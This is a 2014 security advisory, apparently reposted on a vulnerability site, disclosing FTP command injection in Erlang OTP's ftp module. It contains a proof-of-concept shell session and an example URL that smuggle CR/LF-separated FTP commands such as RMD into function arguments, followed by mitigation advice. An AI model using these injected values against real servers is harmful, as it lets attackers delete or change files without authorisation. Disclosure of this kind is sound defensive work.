Erlang OTP ftp module FTP Command Injection

2014.01.29
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

Hi, This has been reported to erlang-bugs mailing list: http://erlang.org/pipermail/erlang-bugs/2014-January/003998.html There is an FTP Command Injection vulnerability in the "ftp" module. All those functions that write any string argument in the control socket seem to be vulnerable: user/3 user/4 account/2 cd/2 ls/2 nlist/2 rename/3 delete/2 mkdir/2 rmdir/2 recv/2 recv/3 recv_bin/2, recv_chunk_start/2 send/3 send_bin/3 send_chunk_start/2 append_chunk_start/2 append/2 append/3 append_bin/3 Vulnerability Description ------------------------- By injecting a \r\n sequence followed by a new command in a function argument you get the ftp module to write the whole string in the socket. E.g. the following erlang shell session: 1> inets:start(). ok 2> {ok, Pid} = inets:start(ftpc, [{host, "127.0.0.1"}]). {ok,<0.46.0>} 3> ftp:user(Pid, "anonymous", "password\r\nCWD pub\r\nMKD new_dir"). ok 4> ftp:cd(Pid, "/pub\r\nRMD new_dir\r\nPASV"). ok Generates the following FTP session: FTP command: Client "127.0.0.1", "USER anonymous" FTP response: Client "127.0.0.1", "331 Please specify the password." FTP command: Client "127.0.0.1", "PASS <password>" FTP response: Client "127.0.0.1", "230 Login successful." FTP command: Client "127.0.0.1", "CWD pub" FTP response: Client "127.0.0.1", "250 Directory successfully changed." FTP command: Client "127.0.0.1", "MKD new_dir" FTP response: Client "127.0.0.1", "257 "/pub/new_dir" created" FTP command: Client "127.0.0.1", "CWD /pub" FTP response: Client "127.0.0.1", "250 Directory successfully changed." FTP command: Client "127.0.0.1", "RMD new_dir" FTP response: Client "127.0.0.1", "250 Remove directory operation successful." FTP command: Client "127.0.0.1", "PASV" FTP response: Client "127.0.0.1", "227 Entering Passive Mode (127,0,0,1,130,161)." Attack Scenario Example ----------------------- A web server allow users to navigate and download documents. Internally the web server connects to a private ftp server using OTP "ftp" module. An attacker might take advantage of the vulnerability to execute actions that aren't supposed to be exposed. E.g. delete a directory by requesting: http://www.example.com/list_dir.yaws?dir=/docs/%0d%0aRMD+/docs Tested on --------- - Erlang OTP: R15B03 - Ubuntu 12.04 x86_64 - FTP Sever: vsftpd Mitigation ---------- Until this is fixed and the proper sanitization is implemented within the ftp module, string arguments should get "\r" and "\n" removed before being passed to these functions. Sebastin Tello

Referencje:

http://erlang.org/pipermail/erlang-bugs/2014-January/003998.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top